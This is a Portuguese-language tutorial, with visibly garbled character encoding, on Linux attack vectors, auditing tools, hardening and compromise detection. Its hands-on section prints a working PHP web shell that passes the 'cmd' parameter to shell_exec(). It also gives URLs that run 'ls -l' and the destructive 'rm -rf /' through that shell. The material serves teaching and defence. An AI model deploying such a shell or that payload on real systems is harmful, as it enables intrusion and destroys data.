Tutorial de Hacking em Linux: Ubuntu Comandos e ferramentas

โšก Resumo Inteligente

O hacking de Linux รฉ a prรกtica de encontrar e explorar vulnerabilidades em sistemas Linux, e esta pรกgina explica as vulnerabilidades que os atacantes visam, as ferramentas de auditoria envolvidas e os controles que mantรชm um servidor protegido.

  • ???? Por que isso รฉ importante: O Linux รฉ executado na maioria dos servidores web e cargas de trabalho em nuvem, o que o torna um alvo de alto valor.
  • ๐Ÿ” Contraponto do cรณdigo aberto: O cรณdigo-fonte pรบblico ajuda os responsรกveis โ€‹โ€‹pela manutenรงรฃo a corrigir problemas rapidamente e auxilia os atacantes na busca por falhas.
  • ๐Ÿงฐ Ferramentas de auditoria: Nessus, Nmap, Lynis e OpenVAS Revela portas abertas, patches ausentes e configuraรงรตes instรกveis.
  • ๐Ÿ’ฅ Vetores de ataque: Credenciais SSH fracas, kernels sem patches, configuraรงรตes incorretas e shells da web sรฃo as principais causas de comprometimento de seguranรงa.
  • ๐Ÿ›ก๏ธ Endurecimento: O gerenciamento de patches, a proteรงรฃo da seguranรงa SSH, o princรญpio do menor privilรฉgio e o controle de acesso obrigatรณrio reduzem drasticamente a exposiรงรฃo.
  • ๐Ÿšจ Detecรงรฃo: Registros de auditoria, verificaรงรตes de integridade de arquivos e detecรงรฃo de intrusรตes expรตem uma violaรงรฃo antes que o dano se alastre.

Tutorial de Hacking Linux

O Linux รฉ o sistema operacional de servidor mais utilizado, especialmente para servidores web. ร‰ de cรณdigo aberto, o que significa que qualquer pessoa pode ler o cรณdigo-fonte. Essa transparรชncia tem dois lados: os mantenedores o utilizam para encontrar e corrigir falhas rapidamente, enquanto os atacantes estudam o mesmo cรณdigo em busca de vulnerabilidades para explorar. O hacking de Linux รฉ a prรกtica de explorar essas vulnerabilidades para obter acesso nรฃo autorizado a um sistema.

As seรงรตes abaixo abordam o que รฉ o Linux, as vulnerabilidades de seguranรงa que o afetam e uma visรฃo prรกtica de hacking com Linux. Ubuntue as contramedidas que vocรช pode implementar.

Nota rรกpida sobre Linux

O Linux รฉ um sistema operacional de cรณdigo aberto. Muitas distribuiรงรตes sรฃo baseadas nele, incluindo Red Hat Enterprise Linux, Fedora, Debian e UbuntuComo o cรณdigo-fonte รฉ pรบblico, pesquisadores, fornecedores e atacantes podem inspecionรก-lo. Os atacantes usam esse acesso para procurar falhas explorรกveis, enquanto a mesma visibilidade permite que os mantenedores lancem correรงรตes mais rapidamente do que as plataformas fechadas costumam conseguir. O Linux funciona como um sistema operacional para servidores, desktops, tablets ou dispositivos mรณveis.

Os programas Linux podem ser executados por meio de uma interface grรกfica ou pela linha de comando. O trabalho pela linha de comando รฉ mais rรกpido e preciso do que clicar em uma interface grรกfica, razรฃo pela qual os testadores de seguranรงa que trabalham em distribuiรงรตes como o Linux preferem essa abordagem. Kali Linux Eles passam quase todo o tempo em um terminal. Conhecer os comandos bรกsicos รฉ, portanto, um prรฉ-requisito prรกtico.

Consulte isso Tutorial Linux para os fundamentos, e para o Kali Linux tutorial para a distribuiรงรฃo com foco em seguranรงa construรญda sobre eles.

Vulnerabilidades de seguranรงa e vetores de ataque comuns no Linux

Os ataques ao Linux raramente dependem de exploits exรณticos. Dados de telemetria publicados ao longo de 2025 e 2026 mostram que a maioria das invasรตes trace voltamos a um pequeno conjunto de fraquezas recorrentes, e conhecรช-las indica onde concentrar primeiro os esforรงos defensivos.

  • Credenciais SSH fracas ou reutilizadas โ€” Tentativas de forรงa bruta e de preenchimento de credenciais contra SSH exposto ร  internet representam a grande maioria da atividade hostil observada em endpoints Linux.
  • Falhas nรฃo corrigidas no kernel e nos pacotes โ€” A equipe do kernel Linux tornou-se uma Autoridade de Numeraรงรฃo CVE em 2024, e o nรบmero de CVEs relatados no kernel aumentou de aproximadamente 290 em 2023 para mais de 3,500 no ano seguinte, fazendo com que o acรบmulo de patches aumente rapidamente.
  • Configuraรงรฃo incorreta โ€” contas padrรฃo, daemons desnecessรกrios, arquivos com permissรฃo de escrita para todos e regras permissivas do sudo concedem privilรฉgios que nรฃo exigiam exploraรงรฃo de vulnerabilidades para serem obtidos.
  • Aplicaรงรตes web vulnerรกveis โ€” falhas como injeรงรฃo SQL E os ataques de cross-site scripting permitem que um invasor acesse o servidor por meio do aplicativo, em vez do sistema operacional. Web shells sรฃo o artefato malicioso mais comum encontrado em servidores Linux comprometidos.
  • Bugs de escalonamento de privilรฉgios โ€” falhas locais que transformam uma conta limitada em root. Algumas sobreviveram sem serem detectadas no kernel por mais de uma dรฉcada antes de serem divulgadas.
  • Risco de dependรชncia e da cadeia de suprimentos โ€” Pacotes de terceiros, bibliotecas de linguagem e imagens de contรชineres incluem cรณdigo que ninguรฉm da equipe operacional revisou.

Nenhuma dessas tรฉcnicas exige que o atacante comprometa o prรณprio Linux. Anรกlises de 2025 intrusรตes revelaram que aproximadamente quatro em cada cinco nรฃo envolveram nenhum malware, dependendo, em vez disso, de configuraรงรตes incorretas e credenciais roubadas.

Ferramentas de hackers para Linux

Os analistas de seguranรงa e administradores de sistemas utilizam os mesmos scanners: um para encontrar vulnerabilidades antes que um invasor o faรงa, o outro para confirmar se as correรงรตes sรฃo eficazes. As ferramentas abaixo sรฃo as mais utilizadas para auditar um host Linux.

ferramenta Formato Licenรงa Uso tรญpico no Linux
Nessus Scanner de vulnerabilidade Comercial Analisa configuraรงรตes, patches ausentes e serviรงos de rede em ambientes mistos.
Nmap Scanner de rede e portas Cรณdigo aberto Identifica os hosts em execuรงรฃo em um servidor, os serviรงos que eles expรตem e quais portas estรฃo abertas.
Lynis Auditoria e reforรงo de seguranรงa do host Cรณdigo aberto Realiza auditorias em um sistema em funcionamento, comparando-o com padrรตes de seguranรงa rigorosos, e relata etapas especรญficas de correรงรฃo.
OpenVAS Scanner de vulnerabilidade Cรณdigo aberto Anรกlise de vulnerabilidades de rede, mantida pela Greenbone como parte de sua Ediรงรฃo Comunitรกria.

A lista nรฃo รฉ exaustiva; ela dรก uma ideia das ferramentas disponรญveis para auditoria. Ubuntu e outros sistemas Linux. Guias mais antigos ainda recomendam o SARA, o Assistente de Pesquisa do Auditor de Seguranรงa, mas sua versรฃo final รฉ de 2009 e o site do projeto estรก offline, entรฃo Lynis e OpenVAS sรฃo as alternativas mantidas.

Atividade de hacking: hackear um Ubuntu Sistema Linux usando PHP

Neste cenรกrio prรกtico, veremos como um host Linux pode ser acessado por meio de uma aplicaรงรฃo web, usando PHP como exemplo. Nenhum computador real serรก alvo do ataque. Se vocรช quiser experimentar, instale o LAMPP, a versรฃo Linux do XAMPP, em sua prรณpria mรกquina.

PHP O pacote inclui duas funรงรตes que podem ser usadas para executar comandos do sistema operacional: `exec()` e `shell_exec()`. A funรงรฃo `exec()` retorna a รบltima linha da saรญda do comando, enquanto `shell_exec()` retorna o resultado completo do comando como uma string.

Para fins de demonstraรงรฃo, suponha que um atacante consiga enviar o seguinte arquivo para um servidor web.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

AQUI,

O script acima recebe o comando da variรกvel GET chamada cmd. O comando รฉ executado usando shell_exec() e o resultado รฉ retornado no navegador.

O cรณdigo acima pode ser explorado usando o seguinte: URL

http://localhost/cp/konsole.php?cmd=ls%20-l

AQUI,

  • โ€œโ€ฆkonsole.php?cmd=ls%20-lโ€ atribui o valor ls โ€“l ร  variรกvel cmd.

O comando sobre o Ubuntu O servidor รฉ, portanto, executado como

shell_exec('ls -l') ;

Executar o cรณdigo acima em um servidor web produz um resultado semelhante ao seguinte.

Saรญda do navegador de um script PHP listando o conteรบdo do diretรณrio e as permissรตes de arquivo em um Ubuntu servidor

A saรญda simplesmente exibe os arquivos no diretรณrio atual e suas permissรตes.

Agora, suponha que o atacante envie o seguinte comando.

rm -rf /

AQUI,

  • O comando โ€œrmโ€ remove arquivos.
  • O parรขmetro โ€œrfโ€ faz com que o comando rm seja executado em modo recursivo, excluindo todas as pastas e arquivos.
  • A barra "/" instrui o comando a iniciar a exclusรฃo a partir do diretรณrio raiz.

O ataque URL ficaria mais ou menos assim

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Um รบnico parรขmetro nรฃo validado รฉ, portanto, suficiente para conceder a um atacante todos os privilรฉgios da conta do servidor web. As duas seรงรตes seguintes existem para impedir que isso aconteรงa e para detectar a falha quando a prevenรงรฃo falhar.

Como prevenir ataques de hackers no Linux

A invasรฃo de sistemas Linux explora vulnerabilidades no sistema operacional e nos softwares que nele sรฃo executados. Uma organizaรงรฃo pode adotar os seguintes controles, aplicados em conjunto, para eliminar a maioria das brechas descritas acima.

  • Gerenciamento de patches โ€” As correรงรตes resolvem as falhas que os atacantes exploram para comprometer um sistema. Uma polรญtica definida garante que as atualizaรงรตes relevantes sejam aplicadas prontamente, em vez de apenas quando alguรฉm se lembra.
  • Configuraรงรฃo adequada do sistema operacional โ€” Desative contas de usuรกrio inativas e serviรงos desnecessรกrios. Altere as configuraรงรตes padrรฃo, incluindo nomes de usuรกrio padrรฃo, senhas de aplicativos compartilhados e nรบmeros de porta padrรฃo.
  • Reforรงo de seguranรงa SSH โ€” Desativar o login de root e a autenticaรงรฃo por senha, permitir apenas usuรกrios ou grupos nomeados e limitar as tentativas de autenticaรงรฃo. Isso fecha o ponto de entrada mais vulnerรกvel a ataques no Linux.
  • Ultimo privilรฉgio โ€” Conceda ร s contas e aos serviรงos apenas os direitos de que precisam e restrinja o sudo a comandos especรญficos, em vez de conceder acesso administrativo irrestrito.
  • Controle de acesso obrigatรณrio โ€” mantenha o SELinux (famรญlia Red Hat) ou o AppArmor (Debian e Ubuntu) em modo de imposiรงรฃo, de forma que um serviรงo comprometido nรฃo consiga alcanรงar o restante do sistema.
  • Validaรงรฃo de entrada โ€” A demonstraรงรฃo acima sรณ funciona porque os dados da requisiรงรฃo chegam a uma funรงรฃo do shell. Nunca passe a entrada do usuรกrio para exec() ou shell_exec().
  • Firewalls e segmentaรงรฃo โ€” exponha apenas as portas que um serviรงo realmente precisa, usando um firewall e segmentaรงรฃo de rede para limitar o que um host comprometido pode alcanรงar.
  • Sistemas de detecรงรฃo de intrusรฃo โ€” essas ferramentas podem ser usadas para detectar acessos nรฃo autorizados ao sistema, e algumas podem atรฉ bloquear a tentativa.
  • Cรณpias de seguranรงa testadas โ€” Backups offline e restaurรกveis โ€‹โ€‹transformam um comando destrutivo como o acima em uma interrupรงรฃo, em vez de uma perda permanente.

Como detectar um sistema Linux comprometido

A prevenรงรฃo acaba falhando, entรฃo a segunda questรฃo รฉ com que rapidez vocรช perceberia o problema. A detecรงรฃo no Linux depende da coleta das evidรชncias corretas antes de um incidente, nรฃo depois.

  • Registro de auditoria โ€” o framework de auditoria do kernel, auditd, registra o uso de privilรฉgios, o acesso a arquivos e as chamadas de sistema de uma forma que um processo comprometido nรฃo possa reescrever silenciosamente. Encaminhe esses logs do host para um coletor central.
  • Registros de autenticaรงรฃo โ€” Uma sequรชncia de falhas seguida por um รบnico sucesso em /var/log/auth.log ou /var/log/secure รฉ a assinatura clรกssica de forรงa bruta.
  • Processos e conexรตes inesperados โ€” Um serviรงo de escuta ou uma conexรฃo de saรญda cuja origem รฉ desconhecida merece investigaรงรฃo imediata.
  • Monitoramento de integridade de arquivo โ€” ferramentas que geram hashes de binรกrios do sistema e arquivos de configuraรงรฃo sinalizam alteraรงรตes em arquivos que nunca deveriam ser alterados.
  • Tarefas agendadas e itens de inicializaรงรฃo โ€” A persistรชncia geralmente รฉ implementada em tarefas cron, unidades systemd ou scripts de perfil do shell.
  • Contas novas ou modificadas โ€” procure por usuรกrios desconhecidos, qualquer segunda conta com UID 0 e chaves SSH que ninguรฉm adicionou.
  • Diretรณrios de servidores web โ€” porque os web shells sรฃo os arquivos maliciosos mais comuns encontrados em servidores Linux, arquivos de script inesperados na raiz de um servidor web merecem atenรงรฃo especial.
  • Auditorias programadas โ€” execute uma ferramenta de auditoria de host, como o Lynis, de forma programada e trate cada relatรณrio como uma lista de tarefas, em vez de um exercรญcio isolado.

Caso encontre indรญcios de comprometimento, isole o host, preserve os logs e uma imagem do disco antes de alterar qualquer coisa e reconstrua a partir de uma mรญdia comprovadamente รญntegra, em vez de tentar limpar um sistema em execuรงรฃo. O tratamento das evidรชncias รฉ abordado em [referรชncia omitida]. forense digital.

Limites legais e รฉticos do hacking em Linux

Todas as tรฉcnicas desta pรกgina sรฃo legais para serem praticadas em sistemas que vocรช possui ou para os quais tem permissรฃo por escrito para testรก-los, e ilegais em quase todos os outros lugares. O exercรญcio acima รฉ realizado deliberadamente em uma instalaรงรฃo local exatamente por esse motivo.

  • Autorizaรงรฃo por escrito โ€” Um escopo assinado, um perรญodo de teste acordado e um contato nomeado sรฃo o que diferenciam um teste de penetraรงรฃo de um crime. Aprovaรงรฃo verbal nรฃo รฉ suficiente.
  • Permaneรงa dentro do escopo โ€” Hosts, intervalos de endereรงos e tรฉcnicas que nรฃo estejam listados nรฃo sรฃo permitidos, mesmo quando estiverem acessรญveis.
  • Manipule os dados com cuidado. โ€” As evidรชncias coletadas durante um teste ainda contรชm dados pessoais reais e devem ser armazenadas com seguranรงa e destruรญdas posteriormente.
  • Denuncie de forma responsรกvel. โ€” divulgar as descobertas ao proprietรกrio e dar tempo para que o problema seja corrigido antes de publicar qualquer coisa.

A exposiรงรฃo legal รฉ real: o acesso nรฃo autorizado a um sistema de computador รฉ um crime, de acordo com leis como a Lei de Fraude e Abuso de Computadores dos EUA e a Lei de Uso Indevido de Computadores do Reino Unido. Se vocรช deseja construir uma carreira com base nessas habilidades, siga um caminho reconhecido โ€” um certificaรงรฃo de seguranรงa Alรฉm disso, vocรช terรก um laboratรณrio prรณprio, em vez de um servidor de terceiros.

Perguntas Frequentes

O Linux se beneficia de uma separaรงรฃo rigorosa entre usuรกrios e de uma superfรญcie de ataque menor em desktops, por isso sofre muito menos com malwares comuns. A exposiรงรฃo em servidores รฉ uma histรณria diferente โ€” hosts Linux voltados para a internet sรฃo atacados constantemente, e a qualidade da configuraรงรฃo determina o resultado.

A verificaรงรฃo de assinaturas รฉ รบtil em servidores de arquivos e de e-mail que gerenciam conteรบdo para outras plataformas. Para a maioria dos hosts Linux, a aplicaรงรฃo de patches, o reforรงo da seguranรงa e a detecรงรฃo baseada em logs oferecem mais valor, jรก que a maioria das intrusรตes nรฃo envolve nenhum arquivo de malware.

Os modelos de aprendizado de mรกquina estabelecem uma linha de base para o comportamento normal de processos, logins e redes em um host e, em seguida, sinalizam desvios que as regras fixas nรฃo detectam โ€” como uma conta de servidor web que gera um shell. Os atacantes usam as mesmas tรฉcnicas para acelerar o reconhecimento, entรฃo ambos os lados estรฃo se movimentando.

Copiloto do GitHub Pode sugerir consultas parametrizadas e alternativas mais seguras para chamadas ao shell quando solicitado diretamente. Ele รฉ treinado com cรณdigo pรบblico, portanto as sugestรตes ainda precisam de revisรฃo โ€” considere-o como um assistente para rascunhos iniciais, nรฃo como um scanner de seguranรงa.

Ambos sรฃo baseados em Debian, mas Kali Linux O sistema inclui centenas de ferramentas de seguranรงa e forenses prรฉ-instaladas e foi desenvolvido para testes. Ubuntu ร‰ uma distribuiรงรฃo de uso geral para desktops e servidores, sendo a melhor opรงรฃo para o uso diรกrio.

Aplique atualizaรงรตes de seguranรงa pelo menos mensalmente e, em poucos dias, para qualquer vulnerabilidade classificada como crรญtica ou sabidamente explorรกvel. Habilite atualizaรงรตes de seguranรงa automรกticas e agende reinicializaรงรตes para que as correรงรตes do kernel entrem em vigor.

Comece com uma certificaรงรฃo de administraรงรฃo Linux, como LPIC ou RHCSA, adicione a CompTIA Security+ e, em seguida, passe para testes de penetraรงรฃo prรกticos ou gerenciamento. track. Guru99 mantรฉm uma lista de certificaรงรตes de seguranรงa cibernรฉtica de acordo com os requisitos atuais.

Utilize uma mรกquina virtual em seu prรณprio hardware ou uma plataforma de treinamento autorizada, como... ExperimenteHackMe, onde os alvos sรฃo fornecidos exatamente para esse propรณsito. Nunca teste um sistema que nรฃo lhe pertence sem permissรฃo por escrito.

Resuma esta postagem com: